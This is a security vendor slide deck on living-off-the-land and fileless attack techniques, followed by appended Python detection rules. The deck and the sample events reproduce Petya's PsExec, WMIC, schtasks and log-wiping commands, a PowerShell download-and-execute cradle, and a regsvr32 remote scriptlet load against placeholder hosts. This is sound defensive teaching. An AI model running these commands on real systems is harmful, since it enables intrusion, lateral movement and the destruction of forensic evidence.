
Living off the land and fileless attack techniques

2,563 views

Published on

There is increased discussion around threats that adopt so-called “living off the land” tactics. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.

Further reading:
Attackers are increasingly living off the land (https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land)

Living off the land and fileless attack techniques (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)

Published in: Technology
  • Very well researched and comprehensive information condensed in relatively few slides

Living off the land and fileless attack techniques

  1. Living off the land tactics, fileless attacks & dual-use tools (title slide: Presenter, Date)
  2. Definition: Living off the land
     Only pre-installed software is used by the attacker and no additional binary executables are installed onto the system.
     Copyright © 2017 Symantec Corporation
  3. Attackers are using what's already available to attack you
     o Fewer new files on disk → more difficult to detect the attack
     o Use off-the-shelf tools & cloud services → difficult to determine intent & source
     o These tools are ubiquitous → hide in plain sight
     o Finding exploitable zero-day vulnerabilities is getting more difficult → use simple and proven methods such as email & social engineering
  4. Multiple fileless methods possible, not all are truly fileless:
     o Memory only attacks: «fileless» attacks, e.g. remote code exploits such as EternalBlue and CodeRed
     o Fileless loadpoint: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
     o Non-PE files: documents with macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell, …)
     o Dual-use tools: using benign tools, such as PsExec, to do malicious things
  5. Living off the land attack chain
     1. Incursion: exploit in memory (e.g. SMB EternalBlue); email with non-PE file (e.g. document macro); weak or stolen credentials (e.g. RDP password guess); remote script dropper (e.g. LNK with PowerShell from cloud)
     2. Persistence: non-persistent, i.e. memory only malware (e.g. SQL Slammer); persistent, i.e. fileless persistence loadpoint (e.g. JScript in registry) or a regular non-fileless method
     3. Payload: regular non-fileless payload; non-PE file payload (e.g. PowerShell script); memory only payload (e.g. Mirai DDoS); dual-use tools (e.g. netsh or PsExec.exe)
  6. Section 1: Memory only attacks
  7. Memory only attacks
     Run malicious code only in memory, does not write any files to disk
     o Mainly remote code execution (RCE) exploits, like EternalBlue
     o CodeRed in 2001 was the first widespread outbreak of this type
     o A computer restart will clean/disinfect
     o PowerShell can be used to load and execute payload in memory
     Attackers do not always need persistence:
     o Mirai bot: re-infects the device through a restart if it gets cleaned
     o Targeted attack groups: core systems do not get restarted often
  8. Section 2: Dual-use tools
  9. Dual-use tools
     System tools and clean applications used for nefarious purposes. Some tools are pre-installed, some are downloaded by the attacker.
     Type of internal activity | Purpose | Dual-use tools
     Internal network reconnaissance | Enumerate information about a target environment | net user, systeminfo, whoami, hostname, quser, ipconfig
     Credential harvesting | Obtain legitimate user credentials to gain access to target systems for malicious purposes | Mimikatz, WCE, pwdump
     Lateral movement | Gain deeper access into target network | PsExec, PowerShell, WMI, RDP
     Data exfiltration | Send data back to attackers | FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip
     Fallback backdoor | Enables a backdoor that can be used, should the main backdoor be removed | net user, RDP, Telnet server
  10. Many attack groups use common system tools during their attacks (information gathering commands observed per group)
     WATERBUG/TURLA: systeminfo; net view; net view /domain; tasklist /v; gpresult /z; arp -a; net share; net use; net user administrator; net user /domain; net user administrator /domain; tasklist /fi
     APPLEWORM/LAZARUS: hostname; whoami; ver; ipconfig -all; ping www.google.com; query user; net user; net view; net view /domain; tasklist /svc; netstat -ano | find TCP; msdtc [IP] [port]
     BILLBUG: net user; ipconfig /all; net start; systeminfo; gpresult
  11. Targeted attacks & dual-use tools
     Group name | Reconnaissance | Credential harvesting | Lateral movement | Custom built tools
     Tick | whoami, procdump, VBS | WCE, Mimikatz, gsecdump | PsExec | Yes
     Waterbug | systeminfo, net, tasklist, gpresult, … | WCE, pwdump | Open shares | Yes
     Suckfly | tcpscan, smbscan | WCE, gsecdump, credentialdumper | - | Yes
     Fritillary | PowerShell, sdelete | Mimikatz, PowerShell | PsExec | Yes
     Destroyer | Disk usage, event log viewer | kerberos manipulator | PsExec, curl, VNC | Yes
     Chafer | network scanner, SMB bruteforcer | WCE, Mimikatz, gsecdump, … | PsExec | Yes
     Greenbug | Broutlook | WCE, gsecdump, browdump, … | TeamViewer, PuTTY | Yes
     Buckeye | os info, user info, smb enumerator, … | pwdump, Lazagne, chromedump, … | Open shares | Yes
     Billbug | ver, net, gpresult, systeminfo, ipconfig, … | - | custom backdoor | Yes
     Appleworm | net, netsh, query, telnet, find, … | dumping SAM | RDP bruteforcer, rdclip | Yes
  12. Targeted attack groups
     o 10 out of 10 groups analyzed used system tools in combination with custom tools during their attacks
     o Application whitelisting often does not protect against such attacks
     Examples:
     o Petya used PsExec, WMI, and LSAdump for lateral movement
     o Calcium/Fin7 group used PowerShell payloads in attacks in 2017
     o Attack against DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method
  13. Dual-use tools: global usage (chart)
     o Mimikatz and PsExec are popular for lateral movement, e.g. Petya
  14. Example: Ransom.Petya
  15. Petya uses dual-use tools
     o Threat is a DLL executed by rundll32.exe
     o Uses recompiled version of LSADump Mimikatz to get passwords
     o Uses PsExec to propagate
       \\[server_name]\admin$\perfc.dat
       psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
     o Uses WMI to propagate if PsExec fails
       wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe "%Windows%\perfc.dat" #1 60"
     o Scheduled task to restart into the malicious MBR payload
       schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
     o Deletes log files to hide traces
       wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
  16. Example: Odinaff group
     The Odinaff group used multiple dual-use tools in their attack
     o Mimikatz: an open source password recovery tool
     o PsExec: a process execution tool from Microsoft
     o Netscan: a network scanning tool
     o Ammyy Admin: a remote access tool
     o Gussdoor: a custom remote backdoor (Backdoor.Gussdoor)
     o RunAs: a tool for running processes as another user
     o PowerShell: various commands used
  17. WMI usage in malware
     o On average 2% of malware in our sandbox misused WMI
  18. Usage of dual-use tools, January 2017
     Tool | Usage count
     sc.exe | 2.7190%
     vnc | 2.1176%
     net.exe | 1.2733%
     powershell.exe | 1.0263%
     ipconfig.exe | 0.8227%
     netsh.exe | 0.7526%
     teamviewer.exe | 0.6224%
     tasklist.exe | 0.4963%
     rdpclip.exe | 0.3226%
     rar.exe | 0.3139%
     wmic.exe | 0.3027%
     find.exe | 0.2767%
     curl.exe | 0.2027%
     netstat.exe | 0.1938%
     systeminfo.exe | 0.1641%
     wget.exe | 0.1208%
     nc.exe | 0.1174%
     gpresult.exe | 0.1147%
     whoami.exe | 0.1109%
     ammyy.exe | 0.1061%
     o System tools are popular with administrators and cyber criminals
     o Remote administration tools are often misused by attackers
  19. Usage of dual-use tools (chart)
     o PowerShell is still gaining popularity with attackers
  20. Section 3: Non-PE files (PE = Portable Executable)
  21. Malicious documents still popular
     o Malicious macro with social engineering
     o Embedded binary can be double clicked
  22. Non-PE files
     o Scripts are very popular, especially PowerShell
     o Many script toolkits available
     o Scripts are easy to obfuscate and difficult to detect with signatures
     o Scripts are flexible and can be quickly adapted if needed
     Example PowerShell downloader:
       powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))
  23. Common malware use cases for PowerShell
     o Downloader: PowerShell script used to download payload to disk or memory; often used in email attachments such as WSF or document macros
     o Loadpoint: PowerShell script used as persistent loadpoint on Windows; often stored completely in registry (fileless), e.g. Kotver, or within WMI
     o Lateral movement: PowerShell remoting to execute on remote computer (Invoke-Command); download and execute Mimikatz, etc. in order to steal credentials
  24. Email script downloaders (chart: detections by month for JavaScript and macro downloaders)
  25. Attachment file extensions (chart)
     o Malicious attachments with HTML code gained popularity in 2017
  26. Prevalence of PowerShell
     o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
     Chart: volume of PowerShell samples from customers in our sandbox in 2016
     Top 3 threats that use PowerShell:
     1. 9.4% W97M.Downloader
     2. 4.5% Trojan.Kotver
     3. 4.0% JS.Downloader
  27. Section 4: Fileless loadpoints
  28. Fileless loadpoints
     There are many ways to have a loadpoint without adding a new file:
     o Windows registry
     o Windows Management Instrumentation (WMI)
     o Group Policy Objects (GPO)
     o Scheduled task
     o …
  29. Script embedded in the registry
     Common: Windows registry run key that points to the malware binary file
     New trick: Windows registry run key contains a script that will get executed
     o This script can load more payloads from other registry keys and run them
     o As the script is not in a file on disk it might be missed by traditional security tools
  30. Example: Poweliks
     o Multiple stages in registry
     o Uses JavaScript and PowerShell
     o Loads DLL directly into memory
     o Decrypted directly in memory
     o Uses non-printable ASCII character to protect own registry key
  31. Remote SCT load
     o Registry run key can also point to a remote SCT file
     o Regsvr32 will download and execute the embedded JScript
       Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
     Example: Downloader.Dromedan (40,000 detections / day)
     o Embedded JScript uses WMI to execute a PowerShell payload
     o Script stores encoded DLL in the registry for later
     (Figure: malicious .sct file)
  32. Fileless loadpoints
     Similar trigger methods exist for:
     o Windows Management Instrumentation (WMI)
     o Group Policy Objects (GPO)
     o Scheduled task
     (Figure: WMI PowerShell backdoor)
  33. Not truly fileless loadpoints
     Without additional files, but writing to existing files
     o File infector: infect any file that gets restarted with the PC
     o Browser files: infect the core browser files or extensions
     o PowerShell profile: add malicious script to profile file
     o Trigger on shutdown: remove itself once started and write registry run key when system shutdown is called
     o BITSadmin: add a malicious update server as backdoor
  34. Detection challenges
     o If no file is written to disk → security measures might not work
     o Lack of indicators of compromise (IoCs) for sharing
     o Common malware does not always use a loadpoint anymore
     o Symantec has various detection features in place for such threats
  35. Mitigation & best practices
     o Monitor the use of dual-use tools inside your network
     o Block remote execution through PsExec and WMI (if applicable)
     o Enable better logging and process the information (if applicable)
     o Enable advanced account security features, like 2FA and login notification (if applicable)
     o Protect against password and credential theft, for example, with behavior based security solutions
  36. Protection solutions (layers on the slide: Attacker, Organization, Users)
     • Deepsight IoC feeds
     • MATI custom reports
     • Threat Intelligence
     • Managed Security Services (MSS)
     • Incident Response (IR) on site
     • Data Loss Prevention (DLP)
     • …
     • Proxy SG secure web gateway
     • Security Analytics
     • Web Security Service
     • Data Center Security (DCS)
     • Control Compliance Suite (CCS)
     • …
     • Symantec Endpoint Protection (SEP) 14: reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …
     • Public awareness/white papers
     • Law enforcement collaboration
     • Infrastructure takedowns
     • …
     • Email Security.cloud
     • MAA Sandbox
     • Advanced Threat Protection (ATP)
     • …
  37. Symantec: robust protection against fileless threats
     Advanced Antivirus Engine
     o Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory scanning, emulator and advanced machine-learning engines. This allows for the detection of fileless threats executed directly in memory.
     SONAR Behavior Engine
     o SONAR is Symantec's real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
     Email Protection
     o Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users. Symantec Messaging Gateway's Disarm Technology can also protect by removing malicious content before it even reaches the user.
     Malware Analysis Sandbox
     o Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
     Network Protection
     o Symantec's Secure Web Gateway and IPS and firewall on the endpoint can monitor and block malicious traffic entering or leaving a system and can help minimize the impact of attacks. Suspicious content can be automatically analyzed on sandboxes.
     System Hardening
     o Symantec's system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of scripts and any of their actions.
     Visibility and Services
     o Symantec's Managed Security Services can help with threat intelligence, with proactive threat hunting, as well as incident response handling.
  38. Conclusion
     o Nearly all targeted attack groups use system tools in their attacks
     o Sandboxes are often not able to handle fileless attacks properly
     o Fileless attacks are difficult to detect as they leave fewer traces
     o Application whitelisting will not protect against all living off the land tactics
     o Script attacks, especially PowerShell, are increasing
  39. Further reading
     o BLOG: Attackers are increasingly living off the land
     o WHITEPAPER: Living off the land and fileless attack techniques
  40. Thank you
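Added example, not part of the deck: detection logic for the dual-use tool chain quoted on slide 15 (PsExec/WMI launching rundll32 with a .dat export, forced reboot via schtasks, wevtutil/fsutil log wiping) and the PowerShell download cradle on slide 22, run over constructed Sysmon-style process-creation events. The events, the credentials and the URL are placeholders; the rule names are my own.

```python
import re

# Rule table: (name, parent-image pattern or None, command-line pattern).
# The patterns follow the command lines quoted on slides 15 and 22.
RULES = [(n, p and re.compile(p, re.I), re.compile(c, re.I)) for n, p, c in [
    ("psexec_spawned_rundll32", r"psexesvc", r"rundll32"),
    ("rundll32_dat_export", None, r"rundll32(\.exe)?[^#]*\.dat\W*#\d+"),
    ("wmic_remote_process_create", None,
     r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create"),
    ("eventlog_clear", None,
     r"wevtutil(\.exe)?\s+cl\s|fsutil(\.exe)?\s+usn\s+deletejournal"),
    ("schtasks_forced_reboot", None,
     r"schtasks(\.exe)?.*/create.*shutdown.*\s/r\b"),
    ("powershell_download_cradle", None,
     r"powershell(\.exe)?.*(-ep\s+bypass|-nop\b).*(downloadstring|iex\b|invoke-expression)"),
]]


def match_event(event):
    """Return the names of every rule that fires on one process-creation event."""
    hits = []
    for name, parent_re, cmd_re in RULES:
        # Parent-aware rules only fire when the spawning process matches too.
        if parent_re and not parent_re.search(event.get("ParentImage", "")):
            continue
        if cmd_re.search(event.get("CommandLine", "")):
            hits.append(name)
    return hits


def scan(events):
    """Map each rule name to the command lines that triggered it."""
    findings = {}
    for event in events:
        for name in match_event(event):
            findings.setdefault(name, []).append(event["CommandLine"])
    return findings


# Constructed Sysmon-style events (not from the deck); credentials and URL are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"rundll32.exe C:\Windows\perfc.dat,#1 60"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic.exe /node:10.0.0.5 /user:CORP\admin /password:[REMOVED] '
                    r'process call create "rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"wevtutil.exe cl System"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"fsutil usn deletejournal /D C:"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%SystemRoot%\System32\shutdown.exe /r /f" /ST 14:42'},
    {"ParentImage": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r"powershell.exe -nop -ep Bypass -noexit -c iex ((New-Object System.Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1'))"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"net.exe user"},  # benign admin use
]

if __name__ == "__main__":
    for rule, cmds in scan(SAMPLE_EVENTS).items():
        print(rule, "->", cmds)
```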
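Added example, not from the deck, for slides 29 to 31: an audit of Run-key values that flags the fileless loadpoint patterns described there (a script embedded in the value instead of a file path, regsvr32 pulling a remote .sct through scrobj.dll, and a non-printable character in the name as on the Poweliks slide). The registry entries are constructed, the URL and encoded payload are placeholders, and the function names are my own.

```python
import re

# Value data that is an executable path, optionally quoted and followed by arguments.
EXE_TARGET = re.compile(r'^\s*"?[A-Za-z]:\\[^"]+?\.(exe|dll|com)"?(\s|$)', re.I)
# Regsvr32 fetching a remote scriptlet through scrobj.dll (slide 31).
REMOTE_SCT = re.compile(r"regsvr32.*(/i:|-i:)\w+://.*scrobj\.dll", re.I)
# Script handed to an interpreter inline rather than as a file (slides 29 and 30).
INLINE_SCRIPT = re.compile(
    r"javascript:|vbscript:|mshta\b|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-c(ommand)?\s+[^-\s]|//e:", re.I)


def audit_run_values(values):
    """Return {value name: [reasons]} for a list of (name, data) Run-key entries."""
    report = {}
    for name, data in values:
        reasons = []
        if any(ord(ch) < 32 or ord(ch) == 127 for ch in name):
            reasons.append("non-printable characters in value name")
        if REMOTE_SCT.search(data):
            reasons.append("regsvr32 loads a remote .sct scriptlet via scrobj.dll")
        elif INLINE_SCRIPT.search(data):
            reasons.append("script body passed inline instead of a file path")
        if not reasons and not EXE_TARGET.match(data):
            reasons.append("does not point at an executable file")
        report[name] = reasons
    return report


def suspicious(values):
    """Names of the entries that drew at least one reason."""
    return [name for name, reasons in audit_run_values(values).items() if reasons]


# Constructed Run-key entries (not from the deck); URL and encoded payload are placeholders.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SunJavaUpdateSched", r'"C:\Program Files\Java\bin\jusched.exe"'),
    ("\x01", r'rundll32.exe javascript:"<stage 2 read from registry>"'),  # Poweliks-style name
    ("Updater", r"regsvr32 /s /n /u /i:http://placeholder.invalid/a.sct scrobj.dll"),
    ("Sync", r"powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUA=="),
    ("Helper", r"C:\Users\alice\AppData\Roaming\helper.vbs"),
]

if __name__ == "__main__":
    for name, reasons in audit_run_values(SAMPLE_RUN_VALUES).items():
        print(repr(name), reasons or "ok")
```

The last entry shows the limit of a path-shape check: a plain script file is not fileless, so it is reported only as "not an executable" and needs the file itself inspected.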
